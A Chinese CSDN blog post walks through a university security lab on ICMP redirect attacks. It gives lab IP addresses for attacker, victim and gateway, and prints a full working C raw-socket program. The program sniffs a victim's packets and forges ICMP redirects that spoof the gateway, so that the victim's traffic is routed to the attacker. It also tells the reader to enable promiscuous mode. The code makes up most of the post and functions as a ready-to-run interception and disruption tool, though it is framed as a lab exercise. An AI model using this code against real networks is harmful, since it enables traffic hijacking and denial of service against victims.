中科大软件学院信息安全实验1 ICMP重定向

已于 2023-11-28 17:29:19 修改
阅读量75 收藏
点赞数
文章标签: 服务器 网络 安全
于 2023-11-20 21:06:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45930223/article/details/134518219
版权

 题目来源Lab1: ICMP重定向 - 知乎

不涉及原理,只讲操作。ubuntu版本很重要,不同版本相同代码可能无法运行。

攻击者A:ip:192.168.244.129 (ubuntu20.04)

被攻击者B:ip:192.168.244.130(ubunutu20.04)

网关C:ip:192.168.244.2

ps:查询本主机ip命令ifconfig

查询网关ip

命令实现重定向

重定向前,B可以ping通

A开始发送重定向包,地址分别是A的ip和网关ip

此时看B已经ping不通百度了

raw socket实现重定向

A的代码文件1个

cmp_redirect.c

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<netinet/ip_icmp.h>
#include<netinet/tcp.h>
#include<netinet/udp.h>
#include<arpa/inet.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<netinet/ether.h>
#define BUFFSIZE 1024
 
/*
*总体思路:每当用raw socket捕获一个特定IP地址的数据包
*就利用收到的数据包的一部分,构造一个ICMP包,发送给该数据包的源IP地址,同时将发送方的身份修改为网关
*重要提示:请确保自己的机子开启了混杂模式!!!不然很难捕获到受害者的数据包
*/
 
/*
*ifconfig eth0 promisc 设置eth0为混杂模式。
*ifconfig eth0 -promisc 取消它的混杂模式
*可能需要加sudo
*/
 
//struct of the packet to be sent
struct packet{
        struct iphdr ip_header;
        struct icmp my_icmp;
}packet;
 
//计算校验和
unsigned short in_cksum(unsigned short *addr, int len)
{
        int sum=0;
        unsigned short res=0;
        while( len > 1)  {
                sum += *addr++;
                len -=2;
               // printf("sum is %x.\n",sum);
        }
        if( len == 1) {
                *((unsigned char *)(&res))=*((unsigned char *)addr);
                sum += res;
        }
        sum = (sum >>16) + (sum & 0xffff);
        sum += (sum >>16) ;
        res = ~sum;
        return res;
}
int main(int argc,char *argv[]){
 
	int recvsock;//用于接收以太网帧的socket
	int sendsock;//用于构造重定向ICMP的socket
	unsigned char buff[BUFFSIZE];
	unsigned char* gateway_ip;
	unsigned char* victim_ip;
	unsigned char* attacker_ip;
	if(argc < 4){
		printf("please enter the ip of gateway victim attacker");
		return -1;
	}
	//将命令行参数分别保存给对应IP地址
	gateway_ip = argv[1];
	victim_ip = argv[2];
	attacker_ip = argv[3];
 
	printf("the victim is %s", victim_ip);
 
	//the receiver of the ICMP redirect packet 
	struct sockaddr_in dest;
    dest.sin_family=AF_INET;
    dest.sin_addr.s_addr=inet_addr(victim_ip);
 
	//create the socket for capturing the very packet
	recvsock = socket(AF_PACKET,SOCK_RAW,htons(ETH_P_ALL));
	if(recvsock < 0){
		printf("raw recvsocket error!\n");
		exit(1);
	}
	//create necessary info for capturing the very packet
	// struct sockaddr_in filteraddr;
	// filteraddr.sin_family = AF_INET;
	// filteraddr.sin_port = 0;
	// filteraddr.sin_addr.s_addr = inet_addr(victim_ip);
	// int addr_len=sizeof(struct sockaddr_in);
 
	//create the sendsock
	sendsock = socket(AF_INET,SOCK_RAW,IPPROTO_ICMP);
	//since we want to send packet as a gateway, we should change the IPheader 
	const int on = 1;
	if(setsockopt(sendsock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(int)) < 0)
	{	
 	 printf("set socket option error!\n");
	}
 
	int res;
	while(1){
		res = recvfrom(recvsock, buff, BUFFSIZE, 0, NULL, NULL);
		if(res < 0){
		printf("receive error!\n");
		return -2;
		}
		struct ip *ip = (struct ip*)(buff+14);
		if(strcmp(inet_ntoa(ip->ip_src), victim_ip) != 0  ){
			continue;
		}
		printf("\ngot a packet from %s \n", inet_ntoa(ip->ip_src));
		printf("%15s", inet_ntoa(ip->ip_src));
		printf("%15s	%5d	\n",inet_ntoa(ip->ip_dst),ip->ip_p);
 
		//next, we will create the redirect packet and send to the victim as a gateway continually
		//first, we create the ip header
		struct packet redirect_pack;
		redirect_pack.ip_header.version = 4;
		redirect_pack.ip_header.ihl = 5;// per 4 bytes
		redirect_pack.ip_header.tos = 0;
		redirect_pack.ip_header.tot_len = htons(56);//packet total length
		redirect_pack.ip_header.id = getpid();
		redirect_pack.ip_header.frag_off = 0;
		redirect_pack.ip_header.ttl = 64;
		redirect_pack.ip_header.protocol = IPPROTO_ICMP;
		redirect_pack.ip_header.check = 0; //checksum set 0 ,finally we will get the correct number
		redirect_pack.ip_header.saddr = inet_addr(gateway_ip);
		redirect_pack.ip_header.daddr = inet_addr(victim_ip);
		//then, we create the partion of IP data (ICMP) of the redirect packet
		redirect_pack.my_icmp.icmp_type = ICMP_REDIRECT;
		redirect_pack.my_icmp.icmp_code = ICMP_REDIR_HOST;
		redirect_pack.my_icmp.icmp_cksum = 0;
		redirect_pack.my_icmp.icmp_hun.ih_gwaddr.s_addr = inet_addr(attacker_ip);//here is the very keypoint 
		//we need to pad something with the packet we captured 
		memcpy(&redirect_pack.my_icmp.icmp_dun, ip, 28);//the padding part include the ip header + 8bytes ip data
		//calculate the checksum again
		redirect_pack.ip_header.check = in_cksum(&(redirect_pack.ip_header), sizeof(redirect_pack.ip_header));
		redirect_pack.my_icmp.icmp_cksum = in_cksum(&(redirect_pack.my_icmp), sizeof(redirect_pack.my_icmp)+8);
		//now we can send the icmp redirect packet
		printf("now we are sending the redirect package to victim %s\n", victim_ip);
		sendto(sendsock, &redirect_pack, 56, 0, (struct sockaddr *)&dest, sizeof(dest));
	}
	close(recvsock);
	close(sendsock);
 
 
}

A上编译,成功会生成a.out文件

A开启混杂模式

此处ens33不定,看本机使用的是哪个网卡决定.

实验结束记得关闭混杂模式:

A运行a.out。传入的地址分别是网关,被攻击者,攻击者。

B无法ping通

结束

yyyydee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实现ICMP重定向攻击
weixin_38885346的博客
12-28 1912
环境:攻击机Ubuntu 18 ,受攻击机Windows7 一、使用netwox体会实验效果,netwox发出的ICMP重定向包的目的IP是受害者的IP,也即,netwox先抓到受害者的数据包,根据捕获包的IP地址,再构造攻击包。 1.Ubuntu安装netwox sudo apt-get install netwox 2.用netwox做重定向攻击 netwox 86 -g 新的网关地址 -i 目标机当前使用的网关地址 3.在目标机上安装wireshark程序(参考网上),执行ping命令,并启动wi
ICMP重定向攻击实验
文武老司机的博客
12-16 3099
ICMP重定向攻击实验: 0x01 攻击目的: ​ 使用攻击机对本网段内靶机进行ICMP重定向攻击。目的是诱使靶机认为攻击机是网关,将所有流量交给攻击机转发。攻击机即可实现中间人身份。 0x02 环境介绍: ​ 攻击机:Kali linux ​ 靶机:ubuntu 20.04 ​ 存在形式:vmware之虚机 ​ 联网方式:NAT ​ IP地址: ​ Gateway:192.168.8.2/24 ​ Kali linux:192.168.8.128/24 ​
linux开启内部路由转发、关闭ICMP重定向功能
wangfei111g的博客
07-20 2万+
一、开启路由转发 转自http://blog.51cto.com/zouqingyun/1697571 一组内部机器需要连接外网,则需要找一台机器,即可以连接外网,内网机器也可以连接。 因此将这台外网机器当做路由器,做路由转发 1、在需要做路由转发的机器上执行下面命令 1  [root@shx ~]# echo 1 &gt; /proc/sys/net/ip...
Ubuntu下ufw 的安装 启动 关闭 重启 禁止主机访问icmp和ftp? 如何禁止主机访问虚拟机上所有端口
宾宾宝宝的博客
11-22 4287
检查是否安装了UFW sudo dpkg --get-selections | grep ufw 显示已经安装 如果没有安装的同学,可以先安装一下 sudo apt-get install ufw 可以查看一下自己的ufw是否运行 sudo ufw status 如果你发现状态是: inactive , 意思是没有被激活或不起作用。 如果要禁用的话,使用命令 sudo ufw disable [–dry–run] 只显示结果而不实际运行 如何启动/关闭/重启ufw 启动防火墙 sudo uf
ubuntu禁止ping操作(禁用ICMP协议访问)
weixin_34262482的博客
04-07 3482
ping命令是计算机之间进行相互检测线路完好的一个应用程序,计算机间交流数据的传输没有经过任何的加密处理,因此我们在用ping命令来检测某一个服务器时,可能在因特网上存在某个非法分子,为了安全我们把ping给禁止掉。 通过专门的黑客程序把在网络线路上传输的信息中途窃取,并利用偷盗过来的信息对指定的服务器或者系统进行攻击,为此我们有必要在Linux系统中禁止使用ping命令。在linux里,如果要...
华为ICMP重定向实验
欢迎
01-05 1855
华为ICMP重定向实验
icmp重定向攻击实验
bunner_的博客
12-27 2938
使用netwox测验 实验环境: 攻击机:kali linux 192.168.181.129 靶机:ubuntu20.04 192.168.181.131 默认网关:192.168.181.2 1、安装必要工具 # 安装 ifconfig 等网络命令 $ sudo apt-get install net-tools # 安装 traceroute $ sudo apt-get install traceroute # 安装 netwox 工具, 攻击机需要 $ sudo apt-get install
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 010-网络安全应急技术与实践(网络层-无线ARP欺骗与消息监听重现分析)
热门推荐
时光隧道
02-08 7万+
无线ARP欺骗(Wireless ARP Spoofing)是一种网络攻击方式,它利用ARP(地址解析协议)中的漏洞,欺骗通信双方,使其将通信数据发送给攻击者,从而实现中间人攻击。消息监听(Message Eavesdropping)则是指攻击者截获并监听通信双方之间的通信数据。以下是无线ARP欺骗与消息监听的重现分析过程:攻击者在同一局域网中启动无线ARP欺骗工具,如Ettercap、ARPwner等。攻击者扫描附近的无线网络,获取目标网络的SSID(无线网络名称)和MAC地址。
网络安全专业名词解释
aixmmmlll的博客
05-16 3824
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
"基于测量的DDoS攻击检测方法及其效率
工程科学与技术,国际期刊23(2020)870完整文章一种基于测量的DDoS攻击检测方法Benjamin Bouyeddoua,Bennett,Benjamin Kadria,Fouzi Harroub,Bennett,Ying SunbSTIC实验室,阿尔及利亚特莱姆森Abou Bekr ...
模糊测试--强制性安全漏洞发掘
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
计算机网络技术2
刘明智的专栏
09-16 9630
2012年3月全国计算机等级考试三级网络技术笔试试卷   一、选择题(每小题1 分,共60分) (1)关于移动互联的描述中,错误的是    01-05: CADBB 06-10: DBDAB 11-15: DCBAA   A) 移动互联发展越来越快B) 智能手持终端将成为主流 C) 终端不再需要后台服务的支持D) 移动互联将会开放世界 (2)关于计算机应用的描述中,正确的是 A) 
ubuntu禁止ping操作
jjy163的专栏
08-26 4488
原来ping是可以禁止的
多进程和多线程基础概念LINUX
2301_79109608的博客
08-22 1120
直接访问物理地址,会导致地址空间没有隔离,很容易导致数据被修改通过虚拟地址空间可以实现每个进程空间都是独立的,操作系统会映射到不用的物理地址区间,在访问时互不干扰.进程状态分为三个基本状态,即运行态,就绪态,阻塞态。在五态模型中,进程分为新建态、终止态,运行态,就绪态,阻塞态。并发:有限的 cpu 核芯的情况下 ,利用快速交替(时间片轮转)执行来达到宏观上的同时执行。虚拟地址 : 虚拟地址并不代表真实的内存空间,而是一个用于寻址的编号。并行:在 cpu 多核的支持下,实现物理上的同时执行。
仿Muduo库实现高并发服务器——Acceptor模块
2201_75324712的博客
08-22 495
Acceptor模块是为了创建套接字,并且接收新到来的客户端套接字,将对应套接字的Channel对象添加到Poller对象中,进行事件监控。
黑神话悟空无法登录服务器怎么办
最新发布
IDC_USA的博客
08-23 582
黑神话悟空游戏在登录的时候会遇到无法登录服务器的问题,玩家可以采用一些有效的方法进行解决,其中最主要的措施就是优化网络环境和减少网络干扰。Rak小编为您整理黑神话悟空无法登录服务器如何解决的步骤及注意事项。
Windows Server查看W3SVC IIS服务器中对应的网站日志
滴水石穿
08-22 369
W3SVC1、W3SVC2、W3SVC3…基本上每个网站存放日志的文件夹名称都是以W3SVC开头,区别在于后面的ID/编号/序号,对应的是网站各自的ID。如果没有自定义站点的日志路径,日志默认的路径是C:\inetpub\logs\LogFiles\。W3SVC日志文件夹中序号的含义,格式就是W3SVC+网站ID。
仿Muduo库实现高并发服务器——Server.hpp框架的简单描述
2201_75324712的博客
08-21 1344
下面这张图 是channel模块,poller模块,TimerWheel模块,EventLoop模块,LoopThreadPool模块进行组合。便于大家对这个项目的理解,因为代码看起来挺复杂的。下面这个图,加入了Connection模块,Buffer模块,socket模块,Acceptor模块,Tcpserver模块。算是将server.hpp,进行了框架描述。
网络编程】select实现服务器与客户端进行通信
2301_77133426的博客
08-21 353
select实现服务器与客户端进行通信
ICMP重定向攻击实验
05-02
ICMP重定向攻击是一种网络攻击,攻击者通过向受害者发送伪造的ICMP重定向消息,欺骗受害者将数据包发送到错误的下一跳路由器,从而达到劫持流量的目的。 以下是ICMP重定向攻击的实验步骤: 1. 准备两台计算机,一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值